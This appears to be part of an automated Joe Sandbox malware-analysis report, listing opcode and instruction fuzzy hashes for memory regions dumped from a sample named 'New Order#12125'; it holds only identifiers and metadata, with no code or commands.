                                                                        • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                        • Instruction ID: 30cfc782f71a827cf20b21d6587e8dcccc155a6bdd9bb39758ade7976c5ec6dd
                                                                        • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                        • Instruction Fuzzy Hash: 49418275B00106AFDB15DFD9CC84AAFBBBABF98A10F24406DE5049B341D775DD4187A0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f627e70cd04b4eba650035cc8a9da27e31505f4e881d0eb9733da24be75d125a
                                                                        • Instruction ID: 840a3551f56f5695169b8f4e5d87cf5254a6629ffc1a2f9bd92b92ec693e110e
                                                                        • Opcode Fuzzy Hash: f627e70cd04b4eba650035cc8a9da27e31505f4e881d0eb9733da24be75d125a
                                                                        • Instruction Fuzzy Hash: 0841C1712083419FD704CF69D8A587ABBE2FFC5625F05896EF8958B392CB30D819CB61
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1a760b1907280527c1f497d0a803804ae5872278fba31f1136e28cb1a275742b
                                                                        • Instruction ID: f535daa39cbbd4526067c1483c68d8efdd94546bf879b4066788f57f546aa197
                                                                        • Opcode Fuzzy Hash: 1a760b1907280527c1f497d0a803804ae5872278fba31f1136e28cb1a275742b
                                                                        • Instruction Fuzzy Hash: 5241AF70600B029FE726CFA8C480A26B7F5FF89254B144A6EE5478FAD0E730E945CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ecffe8219595181e8923ea207a0d2d6d5dccd1aba1d8c1cb0570ebf7d88f17e7
                                                                        • Instruction ID: ccfcf746e98a631b1b6f61e30d537748a071a8647e1ec4b61695de4c55d9ced0
                                                                        • Opcode Fuzzy Hash: ecffe8219595181e8923ea207a0d2d6d5dccd1aba1d8c1cb0570ebf7d88f17e7
                                                                        • Instruction Fuzzy Hash: 8B412030A082959FCB15DFA8C481ABEFBF1FF49300F458889E5C58F646C734A456DB60
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 443702ca12c3bdf4de3195c9a6e1a31a27b7c2c367358c8e1825da91a0182075
                                                                        • Instruction ID: a6a064046f57e730f1db5761460c46d85aa3d8bfff678672abff8646afacc16a
                                                                        • Opcode Fuzzy Hash: 443702ca12c3bdf4de3195c9a6e1a31a27b7c2c367358c8e1825da91a0182075
                                                                        • Instruction Fuzzy Hash: 4C41DB32A41225CFEF21CF68C8947AE7BB0FB5A320F050559D421AF7E5DB349940DBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8d736dc88df1669ddbd710b480198acab5acec8db4237e3215d574a8d76db755
                                                                        • Instruction ID: e9498999ad73efc18d42dc877481cf9f6f4c226c64e38e259d478de5c7ce4629
                                                                        • Opcode Fuzzy Hash: 8d736dc88df1669ddbd710b480198acab5acec8db4237e3215d574a8d76db755
                                                                        • Instruction Fuzzy Hash: 1041EE32E00202DBD7269F98C880A6FBBB5FB94714F26812ED9259F395D775D842CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 242110e23ad40a90f91e992be307da959b6a70bde29c0b23a8ae30de67eb726f
                                                                        • Instruction ID: 681b406afd831bc582967b644227a34dcfbe9b23e4b23849e6c1fc74281bf0c0
                                                                        • Opcode Fuzzy Hash: 242110e23ad40a90f91e992be307da959b6a70bde29c0b23a8ae30de67eb726f
                                                                        • Instruction Fuzzy Hash: 53414C725183179ED312DF65C840A6BB6E9BF84B54F40092FFA84DB260E730DE058BA3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                        • Instruction ID: b4c6b9e879631861e08ef7cea4243f85024d6153951c9b5af8a3adac4ccacb39
                                                                        • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                        • Instruction Fuzzy Hash: 38412871A00211EFDB11DE2994547BEBBB2FF90754F25806FAE598F350D6368D40CB91
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8fde71e31b0e4a90b595bdba8d5db6e9210392757a0b8ef7ab5a8677ee3880f7
                                                                        • Instruction ID: ec729e7bbaca8152cb3f77c1866d3e3409394c0d924fada67aa0626d1fea6082
                                                                        • Opcode Fuzzy Hash: 8fde71e31b0e4a90b595bdba8d5db6e9210392757a0b8ef7ab5a8677ee3880f7
                                                                        • Instruction Fuzzy Hash: F5417C71600602EFD722CF58C840B2ABBF5FF94354F248A6AE449CF291E770E942CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                        • Instruction ID: 75deedb5c38a6d0dc0c0eedbb1f0df2e56518a98d791b6ba23007ef7594eb467
                                                                        • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                        • Instruction Fuzzy Hash: 5A412C75A00705EFDB25CF98C980AAABBF8FF98704B10496DE556DB691D330EA44CF90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e670dd828c136ccd68083a55bd250d47252d823cef32abaf822c5fbc81174675
                                                                        • Instruction ID: 9d47c69f1262fe24d0871cf14110b503244b52e1a8bf891b9762ee707ab0f3f5
                                                                        • Opcode Fuzzy Hash: e670dd828c136ccd68083a55bd250d47252d823cef32abaf822c5fbc81174675
                                                                        • Instruction Fuzzy Hash: A7418E71501702DFCB62EFA8C944A69B7F1FF95314F1085AEC9169F2E1DB30A941CB51
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 881b37862df3d0125159aad8c48fbcfef1f1c84e8ffb69efe81ceee6976b3bad
                                                                        • Instruction ID: 57328a62283364e42c7c678235437256a9dfdf71f3079edfecb809c8d4c83cfd
                                                                        • Opcode Fuzzy Hash: 881b37862df3d0125159aad8c48fbcfef1f1c84e8ffb69efe81ceee6976b3bad
                                                                        • Instruction Fuzzy Hash: A53179B2A00346DFDB12CFA8D440799BBF0FB89714F2185AED119EF251D372A902CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 27c14830bd6be3908fa0d4cc63d819bc7182e33629a94cf0022ba532954cd5c2
                                                                        • Instruction ID: c12636d16d20b88c78a73f833de7bf2337df3f14c1c6e8db12dca4dfc5c9a0c0
                                                                        • Opcode Fuzzy Hash: 27c14830bd6be3908fa0d4cc63d819bc7182e33629a94cf0022ba532954cd5c2
                                                                        • Instruction Fuzzy Hash: C4419433A1402B9BCB28CFA8C49157AB7F1FB88704B5641BDD915EF285DB34A945C790
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f20a03325597b9b221cce9a65c0077cce8ad2daa3fcfe25ca13a88bfede46bbb
                                                                        • Instruction ID: 8dcb18c456663a7b885910282faee6afd704e22218ebd9fe0f934925ccb2ed9f
                                                                        • Opcode Fuzzy Hash: f20a03325597b9b221cce9a65c0077cce8ad2daa3fcfe25ca13a88bfede46bbb
                                                                        • Instruction Fuzzy Hash: EE31E2327001069FD718CEACCC44AA6BB97FF85B14F18852DE918CF285E7B4D945C394
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4d52bea8f6c3ea873f699765f797d991dc8d71d786c7e3caa1f69e05262c03b8
                                                                        • Instruction ID: debab79ca5a9053fb15c1b15d3700215c181a30f0d6e1265a33cc57073facee8
                                                                        • Opcode Fuzzy Hash: 4d52bea8f6c3ea873f699765f797d991dc8d71d786c7e3caa1f69e05262c03b8
                                                                        • Instruction Fuzzy Hash: 8E41D271A056179FDB11DF58CA806ADB7B1BB54760F24832EDA15AF3A0DB30ED418B90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                        • Instruction ID: 928da031d9a1d3646903ce89dbe1f06b6ec5ab79d94f49a68ab8156771bb4507
                                                                        • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                        • Instruction Fuzzy Hash: A2218335A00649EFCB15CF58C980A8EBBF5FF88714F1080A9EE159F241D671EE05DB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 54eeed24e57af9f1ebcfd8052f0c229df74b01567e38c1c285220b8609ae7142
                                                                        • Instruction ID: 2eef26d513838f9a423c7fdbe8c9bec19b12d0e21d80376d5a9f365b19e321ed
                                                                        • Opcode Fuzzy Hash: 54eeed24e57af9f1ebcfd8052f0c229df74b01567e38c1c285220b8609ae7142
                                                                        • Instruction Fuzzy Hash: BC218F72A047569BCB22DF18C880B6B7BE4FBC8760F054919F955AF681D730E9018BA2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 053085cced715201d1777f7aecc6d311713ca444610b52c2a9240723fd8e1ec5
                                                                        • Instruction ID: 0d7d7f111c67d33121966502d9a3ddd1f85420bbc14accc889d88448d3dcc4a3
                                                                        • Opcode Fuzzy Hash: 053085cced715201d1777f7aecc6d311713ca444610b52c2a9240723fd8e1ec5
                                                                        • Instruction Fuzzy Hash: D5313071A00119ABCF14DBA8D894E9FBBB9FB88214F41412DF915EB240DA70AE44CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                        • Instruction ID: bed7a69d32f8015a4ccc867e61c2bbc9f52316bdb8c8bbeffe3786289eace6d0
                                                                        • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                        • Instruction Fuzzy Hash: DA318A31600605AFE721CF68C884F6AB7B9FF85354F1145AAE6129B3A1E730EE02CB50
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ca2018946f7c8f52e09e39cc005437c594ec6595301bb8504e933616792f9ccf
                                                                        • Instruction ID: cae0e0d5e70aac4829ff7d07a8b659cd3a6de811a5a6432af3aa3faf60451ea4
                                                                        • Opcode Fuzzy Hash: ca2018946f7c8f52e09e39cc005437c594ec6595301bb8504e933616792f9ccf
                                                                        • Instruction Fuzzy Hash: 71317F75600216DFCB14DF5CE8869AEB7F6FF84304B154499E8099F391E771EA50CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8dd8438090b11bee37d88325d16f277d1f641360e347c2e0d9b1b0e865414bdc
                                                                        • Instruction ID: d729fb86a89fd568e7850f89eb0332c607587d2b66deb9585536b8faf5b11a18
                                                                        • Opcode Fuzzy Hash: 8dd8438090b11bee37d88325d16f277d1f641360e347c2e0d9b1b0e865414bdc
                                                                        • Instruction Fuzzy Hash: A2217E326102058FDB38CE2DD8806AAB7A2FBD5310FA54878ED15DF2C5D775E855C790
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 099499c9bd258d56feb0aed5a29af4e0fce8da53658b3bb9e9adfe80baad4b26
                                                                        • Instruction ID: c34be488f03d65a70f8198a02441c1decd10dcc3ee238d3cc2f8ef51856e0958
                                                                        • Opcode Fuzzy Hash: 099499c9bd258d56feb0aed5a29af4e0fce8da53658b3bb9e9adfe80baad4b26
                                                                        • Instruction Fuzzy Hash: 4721A07190012A9BDF11EF59C881ABEB7F4FF48740B510069F541FB290E738AD41CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4ca01925e73332b390880332bdd699f11612148728242e7b1154a19095e88e17
                                                                        • Instruction ID: f24413b2be3d74dfc46258f6a3ef190268368a1430dd5bf295dddfba75484ad9
                                                                        • Opcode Fuzzy Hash: 4ca01925e73332b390880332bdd699f11612148728242e7b1154a19095e88e17
                                                                        • Instruction Fuzzy Hash: F921A171600645AFD715EB6CD840F69B7B8FF88754F140169F905EB690E734ED40CB94
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dd2f2e5b7c4457ecf239d87a43881ab4c1799b0b2360d34f4c5c92971d66b118
                                                                        • Instruction ID: 6a3e5071c363328eb3fe0ea4d5ede8a5b6e2a986bba8ae4a4684a841232de22b
                                                                        • Opcode Fuzzy Hash: dd2f2e5b7c4457ecf239d87a43881ab4c1799b0b2360d34f4c5c92971d66b118
                                                                        • Instruction Fuzzy Hash: C621C1725042469BE711FF59C844B5FBBDCBFD1250F080456B9809F291DB30C908C6A1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: db4ac56b1e28559d3bd4828e6b7be188342e192c715d566574cf22eff13b0f13
                                                                        • Instruction ID: e290e44e8c3161f66395d87c18ade85fdeef5596e4a22ebd7395d7d2f9eb2703
                                                                        • Opcode Fuzzy Hash: db4ac56b1e28559d3bd4828e6b7be188342e192c715d566574cf22eff13b0f13
                                                                        • Instruction Fuzzy Hash: 3821F9367057929BF323576C8C14B297BD9BF82B74F190364FA20AF6D2DBA8C801C250
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 660a90b3d0def0bd1da674303e85a82717a4626eccac1ad77680c5954ce75de1
                                                                        • Instruction ID: 12637b0b8ecfc0234053efefd20f322bc83a160bcae9749d4c888cbab8613d89
                                                                        • Opcode Fuzzy Hash: 660a90b3d0def0bd1da674303e85a82717a4626eccac1ad77680c5954ce75de1
                                                                        • Instruction Fuzzy Hash: C421E4612042506FDB05CF1A88B44B6BFE5EFC7125B0A81FAE884CF7A3C524D81AC7A0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7099675976c93c6de7b11645f35d3340047c07497632f928c755460cac930c08
                                                                        • Instruction ID: baf2c2199deb5be76bddbefa114adcc9d26cd6395c09b99f55df9940e31c9a3b
                                                                        • Opcode Fuzzy Hash: 7099675976c93c6de7b11645f35d3340047c07497632f928c755460cac930c08
                                                                        • Instruction Fuzzy Hash: AF217979211A029FD725DF29C901B56B7F5BF88B08F24846CA549CFB61E371E842CB94
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d7d3be6285c6692efe16cae139245712d6b369b38a2273bbf4d5785117df6b84
                                                                        • Instruction ID: 00e1d8e8ec8fabe32bc41159088b1a0a8e4d3f0cc31c8836b37592e0f47f5fff
                                                                        • Opcode Fuzzy Hash: d7d3be6285c6692efe16cae139245712d6b369b38a2273bbf4d5785117df6b84
                                                                        • Instruction Fuzzy Hash: 2D110A72340A127FEB225655AC81FAB76D9FBD4B60F510428B719CF1D0EB70DD0187A5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9d27c7c7ede4ae8a1c3676c82c1e332085c830f2ae0910a2044d8f46da31dcac
                                                                        • Instruction ID: 631fce26fce57be0bccbf50e78b62940500bfc0bd7e83399b1c7564b5588b9c6
                                                                        • Opcode Fuzzy Hash: 9d27c7c7ede4ae8a1c3676c82c1e332085c830f2ae0910a2044d8f46da31dcac
                                                                        • Instruction Fuzzy Hash: 0321E5B1E40209ABDB20DFAAD8809AEFBF8FF98610F10012FE515EB290D7709945CB54
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                        • Instruction ID: 7ae48c8367105c83ced38d090973e188c04ddaffc8bc7f92ac0de62c23df97c0
                                                                        • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                        • Instruction Fuzzy Hash: 692181B290020AEFDF129F58CC40B9EBBB9FF89350F204455F900AB251D734D9509B50
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e15cc66c493ec87e1f16fcafaae683231044017e0eff3148481e84279e4a8e58
                                                                        • Instruction ID: 01d93adab2c06223d5805eeddd4b882b4782e520f90020da7ab498899c2c992b
                                                                        • Opcode Fuzzy Hash: e15cc66c493ec87e1f16fcafaae683231044017e0eff3148481e84279e4a8e58
                                                                        • Instruction Fuzzy Hash: 2821AF33A108119F9B18CF7CC80546AF7E6FFCD35436A427ED912DB2A4D670BA158A84
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                        • Instruction ID: d37047259dad0c441b5a36fd9975d18007a774803fde577482529811605d3871
                                                                        • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                        • Instruction Fuzzy Hash: 9F11DD72600706AFE722DA58CC81F9ABBB8FBD0764F100429F6058F190E671ED44DB60
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5181d11936f6d4c1da24dcebee36d1e4d69a40bde6f59957180cf1a9d9fd1f95
                                                                        • Instruction ID: f0eeeea8da5cfd53f900aa7ab01ca0677c0ca59c476c9155ccd68274bd13a4fd
                                                                        • Opcode Fuzzy Hash: 5181d11936f6d4c1da24dcebee36d1e4d69a40bde6f59957180cf1a9d9fd1f95
                                                                        • Instruction Fuzzy Hash: 5711B231B006119BDB16CF8DC480E5ABBE9BF9A710B18407DEE089F249D6B2D9018B90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                        • Instruction ID: e5c2d663b6fa3ff9967a9fcf501e4e2243fc17ded3f51f2a1b33c3b0a02291e0
                                                                        • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                        • Instruction Fuzzy Hash: C3217972600A41DFD72A9F49C560A6ABBE6FBD5B10F14887DE58ACB610C731EC01CB80
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 109b282de417689e56769a3ef798365f0e1a8e3e609426937603ff6b248b5e7b
                                                                        • Instruction ID: b0b0317616a573e3dc99673da31d5b33654b0815459a4f7b6f2b493170fff896
                                                                        • Opcode Fuzzy Hash: 109b282de417689e56769a3ef798365f0e1a8e3e609426937603ff6b248b5e7b
